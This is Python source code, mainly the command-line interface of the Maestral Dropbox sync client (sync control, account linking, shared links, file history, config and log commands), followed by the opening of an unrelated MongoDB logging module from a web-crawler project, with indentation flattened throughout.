wait_for_startup(config_name)
except CommunicationError:
return
m = MaestralProxy(config_name)
if m.pending_link:
link_dialog(m)
if m.pending_dropbox_folder:
path = select_dbx_path_dialog(config_name, allow_merge=True)
while True:
try:
m.create_dropbox_directory(path)
break
except OSError:
cli.warn(
"Could not create folder. Please make sure that you have "
"permissions to write to the selected location or choose a "
"different location."
)
include_all = cli.confirm("Would you like sync all folders?")
if not include_all:
# get all top-level Dropbox folders
cli.info("Loading...")
entries = m.list_folder("/", recursive=False)
names = [
cast(str, e["name"])
for e in entries
if e["type"] == "FolderMetadata"
]
choices = cli.select_multiple(
"Choose which folders to include", options=names
)
excluded_paths = [
f"/{name}"
for index, name in enumerate(names)
if index not in choices
]
m.excluded_items = excluded_paths
cli.ok("Setup completed. Starting sync.")
m.start_sync()
if foreground:
setup_thread = threading.Thread(target=startup_dialog, daemon=True)
setup_thread.start()
start_maestral_daemon(config_name, log_to_stderr=verbose)
else:
cli.echo("Starting Maestral...", nl=False)
res = start_maestral_daemon_process(config_name)
if res == Start.Ok:
cli.echo("\rStarting Maestral... " + OK)
elif res == Start.AlreadyRunning:
cli.echo("\rStarting Maestral... " + "Already running.")
else:
cli.echo("\rStarting Maestral... " + FAILED)
cli.echo("Please check logs for more information.")
startup_dialog()
@main.command(section="Core Commands", help="Stop the sync daemon.")
@existing_config_option
def stop(config_name: str) -> None:
stop_daemon_with_cli_feedback(config_name)
@main.command(section="Core Commands", help="Run the GUI if installed.")
@config_option
def gui(config_name: str) -> None:
from packaging.version import Version
from packaging.requirements import Requirement
try:
from importlib.metadata import entry_points, requires, version # type: ignore
except ImportError:
from importlib_metadata import entry_points, requires, version # type: ignore
# find all "maestral_gui" entry points registered by other packages
gui_entry_points = entry_points().get("maestral_gui")
if not gui_entry_points or len(gui_entry_points) == 0:
raise cli.CliException(
"No maestral GUI installed. Please run 'pip3 install maestral[gui]'."
)
# check if 1st party defaults "maestral_cocoa" or "maestral_qt" are installed
default_gui = "maestral_cocoa" if sys.platform == "darwin" else "maestral_qt"
default_entry_point = next(
(e for e in gui_entry_points if e.name == default_gui), None
)
if default_entry_point:
# check gui requirements
requirements = [Requirement(r) for r in requires("maestral")] # type: ignore
for r in requirements:
if r.marker and r.marker.evaluate({"extra": "gui"}):
version_str = version(r.name)
if not r.specifier.contains(Version(version_str), prereleases=True):
raise cli.CliException(
f"{r.name}{r.specifier} required but you have {version_str}"
)
# load entry point
run = default_entry_point.load()
else:
# load any 3rd party GUI
fallback_entry_point = next(iter(gui_entry_points))
run = fallback_entry_point.load()
run(config_name)
@main.command(section="Core Commands", help="Pause syncing.")
@existing_config_option
def pause(config_name: str) -> None:
from .daemon import MaestralProxy, CommunicationError
try:
with MaestralProxy(config_name) as m:
m.stop_sync()
cli.ok("Syncing paused.")
except CommunicationError:
cli.echo("Maestral daemon is not running.")
@main.command(section="Core Commands", help="Resume syncing.")
@existing_config_option
def resume(config_name: str) -> None:
from .daemon import MaestralProxy, CommunicationError
try:
with MaestralProxy(config_name) as m:
if not check_for_fatal_errors(m):
m.start_sync()
cli.ok("Syncing resumed.")
except CommunicationError:
cli.echo("Maestral daemon is not running.")
@main.group(section="Core Commands", help="Link, unlink and view the Dropbox account.")
def auth():
pass
@auth.command(name="link", help="Link a new Dropbox account.")
@click.option(
"--relink",
"-r",
is_flag=True,
default=False,
help="Relink to the existing account. Keeps the sync state.",
)
@config_option
@convert_api_errors
def auth_link(relink: bool, config_name: str) -> None:
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
if m.pending_link or relink:
link_dialog(m)
else:
cli.echo(
"Maestral is already linked. Use '-r' to relink to the same "
"account or specify a new config name with '-c'."
)
@auth.command(
name="unlink",
help="""
Unlink your Dropbox account.
If Maestral is running, it will be stopped before unlinking.
""",
)
@click.option(
"--yes", "-Y", is_flag=True, default=False, help="Skip confirmation prompt."
)
@existing_config_option
@convert_api_errors
def auth_unlink(yes: bool, config_name: str) -> None:
if not yes:
yes = cli.confirm("Are you sure you want unlink your account?", default=False)
if yes:
from .main import Maestral
stop_daemon_with_cli_feedback(config_name)
m = Maestral(config_name)
m.unlink()
cli.ok("Unlinked Maestral.")
@auth.command(name="status", help="View authentication status.")
@existing_config_option
def auth_status(config_name: str) -> None:
from .config import MaestralConfig, MaestralState
conf = MaestralConfig(config_name)
state = MaestralState(config_name)
dbid = conf.get("auth", "account_id")
email = state.get("account", "email")
account_type = state.get("account", "type").capitalize()
cli.echo("")
cli.echo(f"Email: {email}")
cli.echo(f"Account type: {account_type}")
cli.echo(f"Dropbox ID: {dbid}")
cli.echo("")
@main.group(section="Core Commands", help="Create and manage shared links.")
def sharelink():
pass
@sharelink.command(name="create", help="Create a shared link for a file or folder.")
@click.argument("dropbox_path", type=DropboxPath())
@click.option(
"-p",
"--password",
help="Optional password for the link.",
)
@click.option(
"-e",
"--expiry",
metavar="DATE",
type=click.DateTime(formats=["%Y-%m-%d", "%Y-%m-%dT%H:%M", "%Y-%m-%d %H:%M"]),
help="Expiry time for the link (e.g. '2025-07-24 20:50').",
)
@existing_config_option
@convert_api_errors
def sharelink_create(
dropbox_path: str,
password: str,
expiry: Optional["datetime"],
config_name: str,
) -> None:
from .daemon import MaestralProxy
expiry_dt: Optional[float]
if expiry:
expiry_dt = expiry.timestamp()
else:
expiry_dt = None
if password:
visibility = "password"
else:
visibility = "public"
with MaestralProxy(config_name, fallback=True) as m:
link_info = m.create_shared_link(dropbox_path, visibility, password, expiry_dt)
cli.echo(link_info["url"])
@sharelink.command(name="revoke", help="Revoke a shared link.")
@click.argument("url")
@existing_config_option
@convert_api_errors
def sharelink_revoke(url: str, config_name: str) -> None:
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
m.revoke_shared_link(url)
cli.ok("Revoked shared link.")
@sharelink.command(
name="list", help="List shared links for a path or all shared links."
)
@click.argument("dropbox_path", required=False, type=DropboxPath())
@existing_config_option
@convert_api_errors
def sharelink_list(dropbox_path: Optional[str], config_name: str) -> None:
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
links = m.list_shared_links(dropbox_path)
link_table = cli.Table(["URL", "Item", "Access", "Expires"])
for link in links:
url = cast(str, link["url"])
file_name = cast(str, link["name"])
visibility = cast(str, link["link_permissions"]["resolved_visibility"][".tag"])
dt_field: cli.Field
if "expires" in link:
expires = cast(str, link["expires"])
dt_field = cli.DateField(_datetime_from_iso_str(expires))
else:
dt_field = cli.TextField("-")
link_table.append([url, file_name, visibility, dt_field])
cli.echo("")
link_table.echo()
cli.echo("")
# ======================================================================================
# Information commands
# ======================================================================================
@main.command(section="Information", help="Show the status of the daemon.")
@existing_config_option
@convert_api_errors
def status(config_name: str) -> None:
from .daemon import MaestralProxy, CommunicationError
check_for_updates()
try:
with MaestralProxy(config_name) as m:
email = m.get_state("account", "email")
account_type = m.get_state("account", "type").capitalize()
usage = m.get_state("account", "usage")
status_info = m.status
account_str = f"{email} ({account_type})" if email else "--"
usage_str = usage or "--"
n_errors = len(m.sync_errors)
color = "red" if n_errors > 0 else "green"
n_errors_str = click.style(str(n_errors), fg=color)
cli.echo("")
cli.echo(f"Account: {account_str}")
cli.echo(f"Usage: {usage_str}")
cli.echo(f"Status: {status_info}")
cli.echo(f"Sync errors: {n_errors_str}")
cli.echo("")
check_for_fatal_errors(m)
sync_errors = m.sync_errors
if len(sync_errors) > 0:
path_column = cli.Column(title="Path")
message_column = cli.Column(title="Error", wraps=True)
for error in sync_errors:
path_column.append(error["dbx_path"])
message_column.append("{title}. {message}".format(**error))
table = cli.Table([path_column, message_column])
table.echo()
cli.echo("")
except CommunicationError:
cli.echo("Maestral daemon is not running.")
@main.command(
section="Information",
help="""
Show the sync status of a local file or folder.
Returned value will be 'uploading', 'downloading', 'up to date', 'error', or 'unwatched'
(for files outside of the Dropbox directory). This will always be 'unwatched' if syncing
is paused. This command can be used to for instance to query information for a plugin to
a file-manager.
""",
)
@click.argument("local_path", type=click.Path(exists=True, resolve_path=True))
@existing_config_option
def filestatus(local_path: str, config_name: str) -> None:
from .daemon import MaestralProxy, CommunicationError
try:
with MaestralProxy(config_name) as m:
stat = m.get_file_status(local_path)
cli.echo(stat)
except CommunicationError:
cli.echo("unwatched")
@main.command(section="Information", help="Live view of all items being synced.")
@existing_config_option
@convert_api_errors
def activity(config_name: str) -> None:
import curses
from .utils import natural_size
from .daemon import MaestralProxy, CommunicationError
try:
with MaestralProxy(config_name) as m:
if check_for_fatal_errors(m):
return
def curses_loop(screen) -> None: # no type hints for screen provided yet
curses.use_default_colors() # don't change terminal background
screen.nodelay(1) # sets `screen.getch()` to non-blocking
while True:
height, width = screen.getmaxyx()
# create header
lines = [
f"Status: {m.status}, Sync errors: {len(m.sync_errors)}",
"",
]
# create table
filenames = []
states = []
col_len = 4
for event in m.get_activity(limit=height - 3):
dbx_path = cast(str, event["dbx_path"])
direction = cast(str, event["direction"])
state = cast(str, event["status"])
size = cast(int, event["size"])
completed = cast(int, event["completed"])
filename = os.path.basename(dbx_path)
filenames.append(filename)
arrow = "↓" if direction == "down" else "↑"
if completed > 0:
done_str = natural_size(completed, sep=False)
todo_str = natural_size(size, sep=False)
states.append(f"{done_str}/{todo_str} {arrow}")
else:
if state == "syncing" and direction == "up":
states.append("uploading")
elif state == "syncing" and direction == "down":
states.append("downloading")
else:
states.append(state)
col_len = max(len(filename), col_len)
for name, state in zip(filenames, states): # create rows
lines.append(name.ljust(col_len + 2) + state)
# print to console screen
screen.clear()
try:
screen.addstr("\n".join(lines))
except curses.error:
pass
screen.refresh()
# abort when user presses 'q', refresh otherwise
key = screen.getch()
if key == ord("q"):
break
elif key < 0:
time.sleep(1)
# enter curses event loop
curses.wrapper(curses_loop)
except CommunicationError:
cli.echo("Maestral daemon is not running.")
@main.command(section="Information", help="Show recently changed or added files.")
@existing_config_option
@convert_api_errors
def history(config_name: str) -> None:
from datetime import datetime
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
events = m.get_history()
table = cli.Table(
[
cli.Column("Path", elide=cli.Elide.Leading),
cli.Column("Change"),
cli.Column("Time"),
]
)
for event in events:
dbx_path = cast(str, event["dbx_path"])
change_type = cast(str, event["change_type"])
change_time_or_sync_time = cast(float, event["change_time_or_sync_time"])
dt = datetime.fromtimestamp(change_time_or_sync_time)
table.append([dbx_path, change_type, dt])
cli.echo("")
table.echo()
cli.echo("")
@main.command(section="Information", help="List contents of a Dropbox directory.")
@click.argument("dropbox_path", type=DropboxPath(), default="")
@click.option(
"-l",
"--long",
is_flag=True,
default=False,
help="Show output in long format with metadata.",
)
@click.option(
"-d",
"--include-deleted",
is_flag=True,
default=False,
help="Include deleted items in listing.",
)
@existing_config_option
@convert_api_errors
def ls(long: bool, dropbox_path: str, include_deleted: bool, config_name: str) -> None:
from .utils import natural_size
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
cli.echo("Loading...\r", nl=False)
entries_iter = m.list_folder_iterator(
dropbox_path,
recursive=False,
include_deleted=include_deleted,
)
if long:
to_short_type = {
"FileMetadata": "file",
"FolderMetadata": "folder",
"DeletedMetadata": "deleted",
}
table = cli.Table(
columns=[
cli.Column("Name"),
cli.Column("Type"),
cli.Column("Size", align=cli.Align.Right),
cli.Column("Shared"),
cli.Column("Syncing"),
cli.Column("Last Modified"),
]
)
for entries in entries_iter:
for entry in entries:
item_type = to_short_type[cast(str, entry["type"])]
name = cast(str, entry["name"])
path_lower = cast(str, entry["path_lower"])
text = "shared" if "sharing_info" in entry else "private"
color = "bright_black" if text == "private" else None
shared_field = cli.TextField(text, fg=color)
excluded_status = m.excluded_status(path_lower)
color = "green" if excluded_status == "included" else None
text = "✓" if excluded_status == "included" else excluded_status
excluded_field = cli.TextField(text, fg=color)
if "size" in entry:
size = natural_size(cast(float, entry["size"]))
else:
size = "-"
dt_field: cli.Field
if "client_modified" in entry:
cm = cast(str, entry["client_modified"])
dt_field = cli.DateField(_datetime_from_iso_str(cm))
else:
dt_field = cli.TextField("-")
table.append(
[name, item_type, size, shared_field, excluded_field, dt_field]
)
cli.echo(" " * 15)
table.echo()
cli.echo(" " * 15)
else:
grid = cli.Grid()
for entries in entries_iter:
for entry in entries:
name = cast(str, entry["name"])
color = "blue" if entry["type"] == "DeletedMetadata" else None
grid.append(cli.TextField(name, fg=color))
grid.echo()
@main.command(section="Information", help="List all configured Dropbox accounts.")
@click.option(
"--clean",
is_flag=True,
default=False,
help="Remove config files without a linked account.",
)
def config_files(clean: bool) -> None:
from .daemon import is_running
from .config import (
MaestralConfig,
MaestralState,
list_configs,
remove_configuration,
)
if clean:
# Clean up stale config files.
for name in list_configs():
conf = MaestralConfig(name)
dbid = conf.get("auth", "account_id")
if dbid == "" and not is_running(name):
remove_configuration(name)
cli.echo(f"Removed: {conf.config_path}")
else:
# Display config files.
names = list_configs()
emails = []
paths = []
for name in names:
conf = MaestralConfig(name)
state = MaestralState(name)
emails.append(state.get("account", "email"))
paths.append(conf.config_path)
table = cli.Table(
[
cli.Column("Config name", names),
cli.Column("Account", emails),
cli.Column("Path", paths, elide=cli.Elide.Leading),
]
)
cli.echo("")
table.echo()
cli.echo("")
# ======================================================================================
# Settings
# ======================================================================================
@main.command(
section="Settings",
help="""
Automatically start the sync daemon on login.
A systemd or launchd service will be created to start a sync daemon for the given
configuration on user login.
""",
)
@click.option("--yes", "-Y", is_flag=True, default=False)
@click.option("--no", "-N", is_flag=True, default=False)
@existing_config_option
def autostart(yes: bool, no: bool, config_name: str) -> None:
from .autostart import AutoStart
auto_start = AutoStart(config_name)
if not auto_start.implementation:
cli.echo(
"Autostart is currently not supported for your platform.\n"
"Autostart requires systemd on Linux or launchd on macOS."
)
return
if yes or no:
if yes:
auto_start.enable()
cli.ok("Enabled start on login.")
else:
auto_start.disable()
cli.ok("Disabled start on login.")
else:
if auto_start.enabled:
cli.echo("Autostart is enabled. Use -N to disable.")
else:
cli.echo("Autostart is disabled. Use -Y to enable.")
@main.group(section="Settings", help="View and manage excluded folders.")
def excluded():
pass
@excluded.command(name="list", help="List all excluded files and folders.")
@existing_config_option
def excluded_list(config_name: str) -> None:
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
excluded_items = m.excluded_items
excluded_items.sort()
if len(excluded_items) == 0:
cli.echo("No excluded files or folders.")
else:
for item in excluded_items:
cli.echo(item)
@excluded.command(
name="add",
help="Add a file or folder to the excluded list and re-sync.",
)
@click.argument("dropbox_path", type=DropboxPath())
@existing_config_option
@convert_api_errors
def excluded_add(dropbox_path: str, config_name: str) -> None:
from .daemon import MaestralProxy
if dropbox_path == "/":
raise cli.CliException("Cannot exclude the root directory.")
with MaestralProxy(config_name, fallback=True) as m:
m.exclude_item(dropbox_path)
cli.ok(f"Excluded '{dropbox_path}'.")
@excluded.command(
name="remove",
help="""
Remove a file or folder from the excluded list and re-sync.
It is safe to call this method with items which have already been included, they will
not be downloaded again. If the given path lies inside an excluded folder, the parent
folder will be included as well (but no other items inside it).
""",
)
@click.argument("dropbox_path", type=DropboxPath())
@existing_config_option
@convert_api_errors
def excluded_remove(dropbox_path: str, config_name: str) -> None:
from .daemon import MaestralProxy, CommunicationError
if dropbox_path == "/":
return cli.echo("The root directory is always included")
try:
with MaestralProxy(config_name) as m:
m.include_item(dropbox_path)
cli.ok(f"Included '{dropbox_path}'. Now downloading...")
except CommunicationError:
raise cli.CliException("Daemon must be running to download folders.")
@main.group(section="Settings", help="Manage desktop notifications.")
def notify():
pass
@notify.command(
name="level",
help="Get or set the level for desktop notifications.",
)
@click.argument(
"level_name",
required=False,
type=click.Choice(["ERROR", "SYNCISSUE", "FILECHANGE"], case_sensitive=False),
)
@existing_config_option
def notify_level(level_name: str, config_name: str) -> None:
from . import notify as _notify
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
if level_name:
m.notification_level = _notify.level_name_to_number(level_name)
cli.ok(f"Notification level set to {level_name}.")
else:
level_name = _notify.level_number_to_name(m.notification_level)
cli.echo(f"Notification level: {level_name}.")
@notify.command(
name="snooze",
help="Snooze desktop notifications of file changes.",
)
@click.argument("minutes", type=click.IntRange(min=0))
@existing_config_option
def notify_snooze(minutes: int, config_name: str) -> None:
from .daemon import MaestralProxy, CommunicationError
try:
with MaestralProxy(config_name) as m:
m.notification_snooze = minutes
except CommunicationError:
cli.echo("Maestral daemon is not running.")
else:
if minutes > 0:
cli.ok(
f"Notifications snoozed for {minutes} min. Set snooze to 0 to reset."
)
else:
cli.ok("Notifications enabled.")
# ======================================================================================
# Maintenance
# ======================================================================================
@main.command(section="Maintenance", help="Move the local Dropbox folder.")
@click.argument("new_path", required=False, type=click.Path(writable=True))
@existing_config_option
def move_dir(new_path: str, config_name: str) -> None:
from .daemon import MaestralProxy
new_path = new_path or select_dbx_path_dialog(config_name)
with MaestralProxy(config_name, fallback=True) as m:
m.move_dropbox_directory(new_path)
cli.ok(f"Dropbox folder moved to {new_path}.")
@main.command(
section="Maintenance",
help="""
Rebuild the sync index.
Rebuilding may take several minutes, depending on the size of your Dropbox.
""",
)
@click.option(
"--yes", "-Y", is_flag=True, default=False, help="Skip confirmation prompt."
)
@existing_config_option
@convert_api_errors
def rebuild_index(yes: bool, config_name: str) -> None:
import textwrap
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
width = cli.get_term_width()
msg = textwrap.fill(
"Rebuilding the index may take several minutes, depending on the size of "
"your Dropbox. Any changes to local files will be synced once rebuilding "
"has completed. If you stop the daemon during the process, rebuilding will "
"start again on the next launch.\nIf the daemon is not currently running, "
"a rebuild will be scheduled for the next startup.",
width=width,
)
cli.echo(msg + "\n")
if yes or cli.confirm("Do you want to continue?", default=False):
m.rebuild_index()
if m._is_fallback:
cli.ok("Daemon is not running. Rebuilding scheduled for next startup.")
else:
cli.ok("Rebuilding now. Run 'maestral status' to view progress.")
@main.command(section="Maintenance", help="List old file revisions.")
@click.argument("dropbox_path", type=DropboxPath())
@click.option(
"-l",
"--limit",
help="Maximum number of revs to list.",
show_default=True,
type=click.IntRange(min=1, max=100),
default=10,
)
@existing_config_option
@convert_api_errors
def revs(dropbox_path: str, limit: int, config_name: str) -> None:
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
entries = m.list_revisions(dropbox_path, limit=limit)
table = cli.Table(["Revision", "Modified Time"])
for entry in entries:
rev = cast(str, entry["rev"])
dt = _datetime_from_iso_str(cast(str, entry["client_modified"]))
table.append([cli.TextField(rev), cli.DateField(dt)])
cli.echo("")
table.echo()
cli.echo("")
@main.command(
section="Maintenance",
help="""
Compare two revisions of a file.
If no revs are passed to the command, you can select the revisions interactively. If
only one rev is passed, it is compared to the local version of the file. The diff is
shown via a pager if longer 30 lines.
Warning: The specified revisions will be downloaded to temp files and loaded into memory
to generate the diff. Depending on the file size, this may use significant disk space
and memory.
""",
)
@click.argument("dropbox_path", type=DropboxPath())
@click.option(
"-v",
"--rev",
help="Revisions to compare (multiple allowed).",
multiple=True,
default=[],
)
@click.option("--no-color", help="Don't use colors for the diff.", is_flag=True)
@click.option("--no-pager", help="Don't use a pager for output.", is_flag=True)
@click.option(
"-l",
"--limit",
help="Maximum number of revs to list.",
show_default=True,
type=click.IntRange(min=1, max=100),
default=10,
)
@convert_api_errors
@existing_config_option
def diff(
dropbox_path: str,
rev: List[str],
no_color: bool,
no_pager: bool,
limit: int,
config_name: str,
) -> None:
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
# Ask for user input if revs are not provided as CLI arguments.
if len(rev) == 0:
entries = m.list_revisions(dropbox_path, limit=limit)
for entry in entries:
cm = cast(str, entry["client_modified"])
field = cli.DateField(_datetime_from_iso_str(cm))
entry["desc"] = field.format(40)[0]
dbx_path = cast(str, entries[0]["path_display"])
local_path = m.to_local_path(dbx_path)
if osp.isfile(local_path):
# prepend local version as an option
entries.insert(0, {"desc": "local version", "rev": None})
index_base = cli.select(
message="New revision:",
options=[e["desc"] for e in entries],
hint="(↓ to see more)" if len(entries) > 6 else "",
)
if index_base == len(entries) - 1:
cli.warn(
"Oldest revision selected, unable to find anything to compare."
)
return
comparable_versions = entries[index_base + 1 :]
index_new = cli.select(
message="Old revision:",
options=[e["desc"] for e in comparable_versions],
hint="(↓ to see more)" if len(comparable_versions) > 6 else "",
)
old_rev = entries[index_new + index_base + 1]["rev"]
new_rev = entries[index_base]["rev"]
elif len(rev) == 1:
old_rev = rev[0]
new_rev = None
elif len(rev) == 2:
old_rev = rev[0]
new_rev = rev[1]
elif len(rev) > 2:
cli.warn("You can only compare two revisions at a time.")
return
# Download up to two revisions to a local temporary folder
# and compare them with a 'diff'. Only text files are supported.
# If an unknown file type was found, everything that doesn't match
# 'text/*', an error message gets printed.
click.echo("Loading ...\r", nl=False)
diff_output = m.get_file_diff(old_rev, new_rev)
if len(diff_output) == 0:
click.echo("There are no changes between the two revisions.")
return
def color(ind: int, line: str) -> str:
"""
Color diff lines.
Inspiration for colors was taken from the
well known command 'git diff'.
"""
if ind < 2:
line = click.style(line, bold=True)
elif line.startswith("+"):
line = click.style(line, fg="green")
elif line.startswith("-"):
line = click.style(line, fg="red")
# Don't highlight these in the intro.
elif line.startswith("@@ "):
line = click.style(line, fg="cyan")
return line
# Color the lines.
if not no_color:
diff_output = [color(i, l) for i, l in enumerate(diff_output)]
# Enter pager if diff is too long
if len(diff_output) > 30 and not no_pager:
click.echo_via_pager("".join(diff_output))
else:
click.echo("".join(diff_output))
@main.command(
section="Maintenance",
help="""
Restore a previous version of a file.
If no revision number is given, old revisions will be listed.
""",
)
@click.argument("dropbox_path", type=DropboxPath())
@click.option("-v", "--rev", help="Revision to restore.", default="")
@click.option(
"-l",
"--limit",
help="Maximum number of revs to list.",
show_default=True,
type=click.IntRange(min=1, max=100),
default=10,
)
@existing_config_option
@convert_api_errors
def restore(dropbox_path: str, rev: str, limit: int, config_name: str) -> None:
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
if not rev:
cli.echo("Loading...\r", nl=False)
entries = m.list_revisions(dropbox_path, limit=limit)
dates = []
for entry in entries:
cm = cast(str, entry["client_modified"])
field = cli.DateField(_datetime_from_iso_str(cm))
dates.append(field.format(40)[0])
index = cli.select(
message="Select a version to restore:",
options=dates,
hint="(↓ to see more)" if len(entries) > 6 else "",
)
rev = cast(str, entries[index]["rev"])
m.restore(dropbox_path, rev)
cli.ok(f'Restored {rev} to "{dropbox_path}"')
@main.group(section="Maintenance", help="View and manage the log.")
def log():
pass
@log.command(name="show", help="Print logs to the console.")
@click.option(
"--external", "-e", is_flag=True, default=False, help="Open in external program."
)
@existing_config_option
def log_show(external: bool, config_name: str) -> None:
from .utils.appdirs import get_log_path
log_file = get_log_path("maestral", config_name + ".log")
if external:
res = click.launch(log_file)
else:
try:
with open(log_file) as f:
text = f.read()
click.echo_via_pager(text)
except OSError:
res = 1
else:
res = 0
if res > 0:
raise cli.CliException(f"Could not open log file at '{log_file}'")
@log.command(name="clear", help="Clear the log files.")
@existing_config_option
def log_clear(config_name: str) -> None:
from .utils.appdirs import get_log_path
log_dir = get_log_path("maestral")
log_name = config_name + ".log"
log_files = []
for file_name in os.listdir(log_dir):
if file_name.startswith(log_name):
log_files.append(os.path.join(log_dir, file_name))
try:
for file in log_files:
open(file, "w").close()
cli.ok("Cleared log files.")
except FileNotFoundError:
cli.ok("Cleared log files.")
except OSError:
raise cli.CliException(
f"Could not clear log at '{log_dir}'. " f"Please try to delete it manually"
)
@log.command(name="level", help="Get or set the log level.")
@click.argument(
"level_name",
required=False,
type=click.Choice(["DEBUG", "INFO", "WARNING", "ERROR"], case_sensitive=False),
)
@existing_config_option
def log_level(level_name: str, config_name: str) -> None:
import logging
from .daemon import MaestralProxy
with MaestralProxy(config_name, fallback=True) as m:
if level_name:
m.log_level = cast(int, getattr(logging, level_name))
cli.ok(f"Log level set to {level_name}.")
else:
level_name = logging.getLevelName(m.log_level)
cli.echo(f"Log level: {level_name}")
@main.group(
section="Maintenance",
help="""
Direct access to config values.
Warning: Changing some config values must be accompanied by maintenance tasks. For
example, changing the config value for the Dropbox location needs to be accompanied by
actually moving the folder. This command only gets / sets the value in the config file.
Most changes will also require a restart of the daemon to become effective.
Use the commands from the Settings section instead wherever possible. They will take
effect immediately, perform accompanying tasks for you, and never leave the daemon in an
inconsistent state.
Currently available config keys are:
\b
- path: the location of the local Dropbox folder
- excluded_items: list of files or folders excluded by selective sync
- account_id: the ID of the linked Dropbox account
- notification_level: the level for desktop notifications
- log_level: the log level.
- update_notification_interval: interval in secs to check for updates
- keyring: the keyring backend to use (full path of the class)
- reindex_interval: the interval in seconds for full reindexing
- max_cpu_percent: maximum CPU usage target per core
- keep_history: the sync history to keep in seconds
- upload: if upload sync is enabled
- download: if download sync is enabled
""",
)
def config():
pass
@config.command(name="get", help="Print the value of a given configuration key.")
@click.argument("key", type=ConfigKey())
@config_option
def config_get(key: str, config_name: str) -> None:
from .config import MaestralConfig
from .config.main import KEY_SECTION_MAP
from .daemon import MaestralProxy, CommunicationError
# Check if the config key exists in any section.
section = KEY_SECTION_MAP.get(key, "")
if not section:
raise cli.CliException(f"'{key}' is not a valid configuration key.")
try:
with MaestralProxy(config_name) as m:
value = m.get_conf(section, key)
except CommunicationError:
value = MaestralConfig(config_name).get(section, key)
cli.echo(value)
@config.command(
name="set",
help="""
Update configuration with a value for the given key.
Values will be cast to the proper type, raising an error where this is not possibly. For
instance, setting a boolean config value to 1 will actually set it to True.
""",
)
@click.argument("key", type=ConfigKey())
@click.argument("value")
@config_option
@convert_api_errors
def config_set(key: str, value: str, config_name: str) -> None:
import ast
from .config.main import KEY_SECTION_MAP, DEFAULTS_CONFIG
from .daemon import MaestralProxy
section = KEY_SECTION_MAP.get(key, "")
if not section:
raise cli.CliException(f"'{key}' is not a valid configuration key.")
default_value = DEFAULTS_CONFIG[section][key]
if isinstance(default_value, str):
py_value = value
else:
try:
py_value = ast.literal_eval(value)
except (SyntaxError, ValueError):
py_value = value
try:
with MaestralProxy(config_name, fallback=True) as m:
m.set_conf(section, key, py_value)
except ValueError as e:
cli.warn(e.args[0])
@config.command(name="show", help="Show all config keys and values")
@click.option("--no-pager", help="Don't use a pager for output.", is_flag=True)
@config_option
def config_show(no_pager: bool, config_name: str) -> None:
import io
from .config import MaestralConfig
conf = MaestralConfig(config_name)
with io.StringIO() as fp:
conf.write(fp)
if no_pager:
click.echo(fp.getvalue())
else:
click.echo_via_pager(fp.getvalue())
@main.command(
section="Maintenance",
help="""
Generate completion script for your shell.
This command can generate shell completion scripts for bash, zsh or fish. Follow the
instructions below for your shell to load the resulting script. The exact config file
locations might vary based on your system. Make sure to restart your
shell before testing whether completions are working.
### bash
You can enable shell completion for all users by generating and saving the script as
follows:
\b
maestral completion bash > /usr/share/bash-completion/completions/maestral
To enable shell completion for the current user only, save the script in a location of
your choice, for example `~/.local/completions/maestral`, and source it in `~/.bashrc`
by adding the line:
\b
. ~/.local/completions/maestral
### zsh
Generate a `_maestral` completion script and put it somewhere in your `$fpath`. For
example:
\b
maestral completion zsh > /usr/local/share/zsh/site-functions/_maestral
You can also save the completion script in a location of your choice and source it
in `~/.zshrc`. Ensure that the following is present in your `~/.zshrc`:
\b
autoload -Uz compinit && compinit
### fish
Generate and save a `maestral.fish` completion script as follows. For all users:
\b
maestral completion fish > /usr/share/fish/vendor_completions.d/maestral.fish
For the current user only:
\b
maestral completion fish > ~/.config/fish/completions/maestral.fish
""",
)
@click.argument("shell", type=click.Choice(["bash", "zsh", "fish"]))
def completion(shell: str) -> None:
from click.shell_completion import get_completion_class
comp_cls = get_completion_class(shell)
if comp_cls is None:
cli.warn(f"{shell} shell is currently not supported")
return
comp = comp_cls(main, {}, "maestral", "_MAESTRAL_COMPLETE")
try:
click.echo(comp.source())
except RuntimeError as exc:
cli.warn(exc.args[0])
|
log.py
|
# coding=utf-8
import logging
import sys
import traceback
from collections import OrderedDict
from datetime import datetime
from queue import Empty
from queue import Queue
from threading import Thread
from mongoengine import fields
from zspider.confs.conf import INNER_IP
from zspider.confs.conf import LOG_DATEFORMAT
from zspider.utils import engine
from zspider.utils.fields_models import FBaseQuerySet
from zspider.utils.fields_models import IpField
__author__ = "zephor"
LEVELS = OrderedDict()
LEVELS[logging.NOTSET] = "NSET"
LEVELS[logging.DEBUG] = "DBUG"
LEVELS[logging.INFO] = "INFO"
LEVELS[logging.WARN] = "WARN"
LEVELS[logging.ERROR] = "ERRO"
LEVELS[logging.FATAL] = "FATL"
class BaseLog(engine.DynamicDocument):
meta = {
"abstract": True,
"queryset_class": FBaseQuerySet,
"index_background": True,
"indexes": ["#ip", ("-time", "-msecs")], # hashed index
}
ip = IpField(required=True, verbose_name=u"机器ip")
pid = fields.IntField(required=True)
pathname = fields.StringField(verbose_name=u"文件")
lineno = fields.IntField(required=True, verbose_name=u"行号")
level = fields.IntField(default=logging.NOTSET, choices=LEVELS.keys())
msg = fields.StringField(verbose_name=u"信息")
time = fields.DateTimeField(required=True, verbose_name=u"时间")
msecs = fields.FloatField(required=True)
class LogCrawler(BaseLog):
meta = {
"max_size": 5 * 2 ** 30,
"max_documents": 10000000,
"indexes": ["task_id", "#url", "$task_name"],
}
task_id = fields.ObjectIdField(verbose_name=u"任务ID")
task_name = fields.StringField(max_length=32, verbose_name=u"任务名称")
url = fields.URLField()
class LogDispatcher(BaseLog):
meta = {"max_size": 512 * 2 ** 20, "max_documents": 1000000}
task_id = fields.ObjectIdField(verbose_name=u"任务ID")
class ThreadMongoHandler(logging.Handler):
# reserve or special handled fields
RECORD_FIELDS = {
"threadName",
"name",
"thread",
"created",
"process",
"processName",
"args",
"module",
"filename",
"levelno",
